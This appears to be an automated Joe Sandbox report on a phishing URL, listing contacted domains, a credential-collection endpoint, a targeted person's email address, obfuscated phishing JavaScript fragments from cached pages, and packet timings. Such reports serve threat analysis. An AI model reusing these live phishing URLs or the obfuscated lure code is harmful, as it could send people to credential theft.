            NameIPActiveMaliciousAntivirus DetectionReputation
            kit.fontawesome.com.cdn.cloudflare.net
            		104.18.40.68
            		truefalse
              		high
              d26p066pn2w0s0.cloudfront.net
              		13.32.27.129
              		truefalse
                		high
                electjimhenderson.com
                		76.223.67.189
                		truefalse
                  		unknown
                  txlocksmithbellaire.com
                  		184.168.29.58
                  		truetrue
                    		unknown
                    www.google.com
                    		142.250.184.228
                    		truefalse
                      		high
                      s3-r-w.eu-central-1.amazonaws.com
                      		3.5.138.248
                      		truefalse
                        		high
                        kit.fontawesome.com
                        		unknown
                        		unknownfalse
                          		high
                          exy77.s3.eu-central-1.amazonaws.com
                          		unknown
                          		unknowntrue
                            		unknown
                            logo.clearbit.com
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://txlocksmithbellaire.com/xzm/result.phptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://electjimhenderson.com/wp-includes/images/Docubg.jpgfalse
                              • Avira URL Cloud: phishing
                              		unknown
                              https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.detrue
                                		unknown
                                https://electjimhenderson.com/wp-includes/images/banner.jpgfalse
                                • Avira URL Cloud: phishing
                                		unknown
                                https://exy77.s3.eu-central-1.amazonaws.com/nm.htmlfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://kit.fontawesome.com/f6136e9b49.jsfalse
                                  		high
                                  https://logo.clearbit.com/iprotex.defalse
                                    		high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://blackhackertools.comchromecache_53.3.dr, chromecache_55.3.drtrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    76.223.67.189
                                    		electjimhenderson.comUnited States
                                    		16509AMAZON-02USfalse
                                    13.32.27.77
                                    		unknownUnited States
                                    		7018ATT-INTERNET4USfalse
                                    104.18.40.68
                                    		kit.fontawesome.com.cdn.cloudflare.netUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    184.168.29.58
                                    		txlocksmithbellaire.comUnited States
                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                    3.5.138.248
                                    		s3-r-w.eu-central-1.amazonaws.comUnited States
                                    		16509AMAZON-02USfalse
                                    239.255.255.250
                                    		unknownReserved
                                    		unknownunknownfalse
                                    142.250.184.228
                                    		www.google.comUnited States
                                    		15169GOOGLEUSfalse
                                    13.32.27.129
                                    		d26p066pn2w0s0.cloudfront.netUnited States
                                    		7018ATT-INTERNET4USfalse

                                    Private

                                    IP
                                    192.168.2.6

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1597376
                                    Start date and time:2025-01-23 08:04:29 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 3m 14s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:browseurl.jbs
                                    Sample URL:https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:7
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal72.spre.phis.win@17/15@16/9
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 142.250.186.99, 216.58.206.78, 74.125.133.84, 142.250.185.206, 142.250.186.142, 20.60.22.33, 142.250.185.202, 142.250.185.163, 142.250.181.234, 142.250.184.234, 142.250.185.106, 142.250.186.74, 216.58.206.42, 172.217.18.10, 142.250.184.202, 142.250.185.138, 142.250.186.42, 142.250.185.74, 142.250.186.170, 142.250.186.106, 172.217.16.202, 216.58.212.170, 142.250.186.138, 172.217.18.106, 184.30.131.245, 199.232.210.172, 142.250.185.142, 142.250.184.227, 142.250.176.206, 74.125.0.74, 172.217.16.206, 184.28.90.27, 13.107.246.45, 4.245.163.56
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    Chrome Cache Entry: 49

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (1572)
                                    Category:downloaded
                                    Size (bytes):21548
                                    Entropy (8bit):5.2482120808797434
                                    Encrypted:false
                                    SSDEEP:384:DFCfzFCkFCFFChFCy4FC/qY4eFCcFC8FC3CfaCDCwCkCyfC/qY45CLCrCcCfFCYK:DFaF7FOFsFJ4FaLFxF9FyNSpbJfai0YL
                                    MD5:1259EC64BE82B4AC34A247A8FE3CC72C
                                    SHA1:6A6F9D788F60BAECCA04BD8E905CEDC0A209197B
                                    SHA-256:E7D3456A36699EE3CF0E0D319530AEE132FC6C19C37C65C0B4B986152F7C9547
                                    SHA-512:12D728AA26C54A3D27363C4F1E00F917580477073DEEDFADE80357EB1A57D2AA9DBB758C7676C0EA24FE9E225A91D31DC82A881E6D51A622C69998A2463C655C
                                    Malicious:false
                                    Reputation:low
                                    URL:"https://fonts.googleapis.com/css?family=Roboto:100,400,500,700"
                                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 100;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 100;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 100;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 100;. font-st

                                    Chrome Cache Entry: 50

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):114
                                    Entropy (8bit):4.802925647778009
                                    Encrypted:false
                                    SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                    MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                    SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                    SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                    SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                    Malicious:false
                                    Reputation:low
                                    Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                    Chrome Cache Entry: 51

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):9
                                    Entropy (8bit):2.94770277922009
                                    Encrypted:false
                                    SSDEEP:3:mn:mn
                                    MD5:722969577A96CA3953E84E3D949DEE81
                                    SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                    SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                    SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                    Malicious:false
                                    Reputation:low
                                    URL:https://kit.fontawesome.com/f6136e9b49.js
                                    Preview:Forbidden

                                    Chrome Cache Entry: 52

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):28
                                    Entropy (8bit):4.2359263506290326
                                    Encrypted:false
                                    SSDEEP:3:QQinPHmzY:+PHmzY
                                    MD5:54AFDE25F8CA81DE2113349FEAC16BC8
                                    SHA1:C4DD2351FFCC3EF8C4DB419F140E286C3E96601C
                                    SHA-256:9E2BA08CF97AB272D06D0240A8D8F1261E5EF0BF58730350815FC3E6EC61060B
                                    SHA-512:74B1F45361805F8EE4087BD77C6857A7E6B67CF8795B74EF91D951813DC51B8061F3987C75419F31C112287653F57215805FCAF74B5ADA5302C3909ED6032BD0
                                    Malicious:false
                                    Reputation:low
                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwlJyJjyK4nxnBIFDXhvEhkSBQ0Hpi0s?alt=proto
                                    Preview:ChIKBw14bxIZGgAKBw0Hpi0sGgA=

                                    Chrome Cache Entry: 53

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (65423), with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):77786
                                    Entropy (8bit):4.386645126161226
                                    Encrypted:false
                                    SSDEEP:768:P4xtBugAFrIoT2HGnUEU9daO6L+mPGkhSwmoWbihLAiQf5w:rgAFL
                                    MD5:E7C43AC0588DF167770DF7B356AF19BF
                                    SHA1:57248FD4D945A64449AD9B7D55DC17538A89AF8F
                                    SHA-256:F73CDD40801AA01DC58E754D469C5644215105BC04B4D661C3919F0CE14C7D47
                                    SHA-512:6FC765F65BC1E3EDF7FF8CAE6A857351738D6987EEE0235FA63E895911EA8622B49AE324327EAFC7CFD5EEAB133AE975A5449FF2D399FC2A329F820EE8C053CD
                                    Malicious:false
                                    Reputation:low
                                    URL:https://exy77.s3.eu-central-1.amazonaws.com/nm.html
                                    Preview:<script language="javascript">.. ..// == Code Obfuscation Protection from https://blackhackertools.com == //..var _0x1ed2e1=_0x2ee2;function _0x2ee2(_0x9c9942,_0x48bc01){var _0x3ba28f=_0xc205();return _0x2ee2=function(_0x5adf18,_0x109a96){_0x5adf18=_0x5adf18-(-0x25f9+0x1342+-0x269*-0x8);var _0x4d6e10=_0x3ba28f[_0x5adf18];return _0x4d6e10;},_0x2ee2(_0x9c9942,_0x48bc01);}(function(_0x3013e4,_0x5c3302){var _0x35ea46=_0x2ee2,_0x6634c6=_0x3013e4();while(!![]){try{var _0x3d5eee=parseInt(_0x35ea46(0x578))/(0x177+-0x335*0x1+0x1*0x1bf)*(parseInt(_0x35ea46(0x5b9))/(0x333+0x1f3f+-0x10*0x227))+parseInt(_0x35ea46(0x5e4))/(0x19b0+0x1*-0x244d+0x550*0x2)*(-parseInt(_0x35ea46(0x7a7))/(0x1409+-0x33*-0x97+-0x321a))+-parseInt(_0x35ea46(0x63c))/(0x24b3*0x1+-0x1153+-0x135b*0x1)*(-parseInt(_0x35ea46(0x614))/(0x761*-0x3+-0x1*-0xfc2+-0x95*-0xb))+parseInt(_0x35ea46(0x5c0))/(-0xca5+-0x1b4f+-0x1bd*-0x17)*(parseInt(_0x35ea46(0x619))/(0xe10+-0x7*-0x9d+-0x1253))+-parseInt(_0x35ea46(0x5c4))/(0x234a*0x1+0x1258+0x1*

                                    Chrome Cache Entry: 54

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):114
                                    Entropy (8bit):4.802925647778009
                                    Encrypted:false
                                    SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                    MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                    SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                    SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                    SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                    Malicious:false
                                    Reputation:low
                                    Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                    Chrome Cache Entry: 55

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (4835), with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):4966
                                    Entropy (8bit):5.003638420463747
                                    Encrypted:false
                                    SSDEEP:96:PbxvRsn8UEe5lyvn+OYDTOV1l9laKRA4VoKRXje7D5T:Pnq8fOo/+3DTOvVRLddc9T
                                    MD5:6F1E2A9135051DECDFFBB7717D983D1E
                                    SHA1:3960C4C0B53E35E31F6EEAD92E4F2B6E9D09A2BF
                                    SHA-256:2B50B2356BB1C73432BC98BC6F64AF586B33D84EA03BD8926A1F2542AA2E50C9
                                    SHA-512:10485F304A6683C9BBD2B73564AA9F510817A023D1E4CE627A7E6DB641F85D089B09B5968C549B1301DB565F83E04F60BCD0E24A913512B9CFEC3B857599032F
                                    Malicious:false
                                    Reputation:low
                                    URL:https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==
                                    Preview:<script language="javascript">.. ..// == Code Obfuscation Protection from https://blackhackertools.com == //..function _0x1fe0(){var _0x1bb0c6=['%61%76%61%','0%76%61%72','4%3D%22%6E','%28%66%75%','0%6E%61%6D','%77%2E%6C%','72%65%66%6','0%20%3C%6D','0A%20%20%2','0%7D%29%28','4%65%6E%74','13587dXTOjy','20%3D%20%3','%20%61%74%','4%20%74%79','3%3B%0A%20','%6C%6F%63%','E%2A%29%24','%72%69%70%','22%3E%0A%2','%3E%0A%20%','C%72%65%2E','%65%78%65%','6F%63%61%7','F%64%79%3E','F%6E%20%3D','%72%22%20%','write','%20%76%61%','%20%74%65%','20%20%20%2','%28%29%20%','0A%3C%62%6','%61%64%3E%','%3C%73%63%','0%29%20%74','D%65%3D%22','%3B%0A%20%','9%6F%6E%20','8%74%65%73','75%3D%28%2','6F%2D%72%6','6D%6C%3E','1112PklkVD','5912DFhiYg','4%6F%77%2E','5%72%22%20','3D%3D%20%3','8%74%2F%6A','%20%20%20%','%2F%69%67%','63%6F%6E%7','%20%2F%6C%','%65%76%65%','%3D%22%6E%','C%2F%68%65','B%31%5D%29','2%65%20%3D','74%3E%0A%3','%3C%68%74%','2651455sPMLlm','22%74%65%7','20%6E%61%6','6F%62%28%6','%72%65%66%','%70%65%3D%

                                    Chrome Cache Entry: 56

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                    Category:downloaded
                                    Size (bytes):27252
                                    Entropy (8bit):7.9891895049947195
                                    Encrypted:false
                                    SSDEEP:768:mUmIex+1xK2H1XsC+Ifbhl84t4VyUp88h7:FPyKhNsyc
                                    MD5:5E4F53A8EEDB3574AC841E991494589A
                                    SHA1:32DF0577C8A230C2C9C10CFDA393DDAF1ADAC5D5
                                    SHA-256:79D8BD935497116D303BCE3D64D6B6078CB65004C57546ED7F0EDB9DB30BA19D
                                    SHA-512:8C39F5056555FD8BAE010E88F8B23743C834D03217873F89FBE701049688290E2A6EBE200D8936B6AA26661715CAA45CE9E6423C7DBADE32E7CB234E59D1396D
                                    Malicious:false
                                    Reputation:low
                                    URL:https://logo.clearbit.com/iprotex.de
                                    Preview:.PNG........IHDR.............L\....j;IDATx...y.].u.x..{.........$..$HJ..J.l.K"Yr./...c........L.v..$.L,..<.$.lm.b...../.t..n....V.9.U..DR.,.........{.....s~.ZD...K.8~.......W1....E.A<.....]...$..f....6..N.^......n....M}i.........k....._....R......A..9.....m*..3%B(...T..$. ..+D. ..m7....J|..@.......%{.....r.o].o}U...$@..8<..P.h..8.u!GiC....N_Y..?~.k])7.....J/..."!.J.....z.q.y.w?...;.OYt.M...$...a...?....vo.k.:.<C;..C..U..G../U.2*........h/Z..&..;.R.?.....x..........1.Z.$...XB....1...l{.xn.....[A.eD.P.b.k)....k...k..7..0..".(\....<.[1.......g......._i.Iki[..TF!..a.....#........g..oy..f..8.....5.%.....P[P.}..\..^..nn.pF..q.:>..k...G..\.....;Sn)......i)&..EO...xG.@.p. h%>C......`...?..?~..O.h..z..ku.....{vlH....AF..r..0....L(.z^..;.R..6.|...E...P. X.`^>s}..~|.Z#Y..bPq.$.5<lkZ....{......V(..!>;sX..L$."W:..=../~b....b....>.B\J..@..|..|...s.k...ifX7P..{+.....F.0.....*.~|.`$.V.~.^...H.`.UJ..p!...c`?O..........}.....?....g.......n.."......}..f.8.K..

                                    Chrome Cache Entry: 57

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):27252
                                    Entropy (8bit):7.9891895049947195
                                    Encrypted:false
                                    SSDEEP:768:mUmIex+1xK2H1XsC+Ifbhl84t4VyUp88h7:FPyKhNsyc
                                    MD5:5E4F53A8EEDB3574AC841E991494589A
                                    SHA1:32DF0577C8A230C2C9C10CFDA393DDAF1ADAC5D5
                                    SHA-256:79D8BD935497116D303BCE3D64D6B6078CB65004C57546ED7F0EDB9DB30BA19D
                                    SHA-512:8C39F5056555FD8BAE010E88F8B23743C834D03217873F89FBE701049688290E2A6EBE200D8936B6AA26661715CAA45CE9E6423C7DBADE32E7CB234E59D1396D
                                    Malicious:false
                                    Reputation:low
                                    Preview:.PNG........IHDR.............L\....j;IDATx...y.].u.x..{.........$..$HJ..J.l.K"Yr./...c........L.v..$.L,..<.$.lm.b...../.t..n....V.9.U..DR.,.........{.....s~.ZD...K.8~.......W1....E.A<.....]...$..f....6..N.^......n....M}i.........k....._....R......A..9.....m*..3%B(...T..$. ..+D. ..m7....J|..@.......%{.....r.o].o}U...$@..8<..P.h..8.u!GiC....N_Y..?~.k])7.....J/..."!.J.....z.q.y.w?...;.OYt.M...$...a...?....vo.k.:.<C;..C..U..G../U.2*........h/Z..&..;.R.?.....x..........1.Z.$...XB....1...l{.xn.....[A.eD.P.b.k)....k...k..7..0..".(\....<.[1.......g......._i.Iki[..TF!..a.....#........g..oy..f..8.....5.%.....P[P.}..\..^..nn.pF..q.:>..k...G..\.....;Sn)......i)&..EO...xG.@.p. h%>C......`...?..?~..O.h..z..ku.....{vlH....AF..r..0....L(.z^..;.R..6.|...E...P. X.`^>s}..~|.Z#Y..bPq.$.5<lkZ....{......V(..!>;sX..L$."W:..=../~b....b....>.B\J..@..|..|...s.k...ifX7P..{+.....F.0.....*.~|.`$.V.~.^...H.`.UJ..p!...c`?O..........}.....?....g.......n.."......}..f.8.K..

                                    Static File Info

                                    No static file info

                                    Network Behavior

                                    Download Network PCAP: filteredfull

                                    Network Port Distribution

                                    • Total Packets: 278
                                    • 443 (HTTPS)
                                    • 53 (DNS)
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 23, 2025 08:05:17.847727060 CET49674443192.168.2.6173.222.162.64
                                    Jan 23, 2025 08:05:17.847836971 CET49673443192.168.2.6173.222.162.64
                                    Jan 23, 2025 08:05:18.113523006 CET49672443192.168.2.6173.222.162.64
                                    Jan 23, 2025 08:05:25.388309002 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:25.388365030 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:25.388427973 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:25.389009953 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:25.389023066 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:26.215820074 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:26.215898991 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:26.220187902 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:26.220201015 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:26.220551014 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:26.222230911 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:26.222398996 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:26.222398996 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:26.222407103 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:26.263336897 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:26.446139097 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:26.446223021 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:26.446566105 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:26.446615934 CET4436486840.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:26.446634054 CET64868443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:27.455440044 CET49673443192.168.2.6173.222.162.64
                                    Jan 23, 2025 08:05:27.455465078 CET49674443192.168.2.6173.222.162.64
                                    Jan 23, 2025 08:05:27.558377981 CET64873443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:05:27.558435917 CET44364873142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:05:27.558517933 CET64873443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:05:27.558904886 CET64873443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:05:27.558940887 CET44364873142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:05:27.721080065 CET49672443192.168.2.6173.222.162.64
                                    Jan 23, 2025 08:05:28.302618027 CET44364873142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:05:28.302911043 CET64873443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:05:28.302939892 CET44364873142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:05:28.304629087 CET44364873142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:05:28.304694891 CET64873443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:05:28.309098959 CET64873443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:05:28.309190989 CET44364873142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:05:28.362013102 CET64873443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:05:28.362025023 CET44364873142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:05:28.408868074 CET64873443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:05:29.386337042 CET44364860173.222.162.64192.168.2.6
                                    Jan 23, 2025 08:05:29.386603117 CET64860443192.168.2.6173.222.162.64
                                    Jan 23, 2025 08:05:31.666055918 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:31.666127920 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:31.666188002 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:31.666608095 CET64885443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:31.666651964 CET443648853.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:31.666697979 CET64885443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:31.666903973 CET64885443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:31.666919947 CET443648853.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:31.667272091 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:31.667294979 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.432506084 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.432771921 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.432800055 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.433788061 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.433855057 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.433865070 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.433922052 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.435009956 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.435076952 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.435182095 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.441667080 CET443648853.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.441867113 CET64885443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.441889048 CET443648853.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.443074942 CET443648853.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.443140030 CET64885443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.443152905 CET443648853.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.443198919 CET64885443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.444251060 CET64885443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.444318056 CET443648853.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.475337029 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.487443924 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.487447977 CET64885443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.487457037 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.487469912 CET443648853.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.534852982 CET64885443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.534904003 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.734858990 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.736877918 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.736900091 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.736941099 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.736943960 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.736963034 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.736975908 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.736982107 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.736990929 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.737011909 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.737015963 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.737026930 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.737031937 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.737056017 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.789093971 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.789113998 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.832618952 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852253914 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852286100 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852303982 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852324963 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852349997 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852371931 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852376938 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852399111 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852401972 CET443648843.5.138.248192.168.2.6
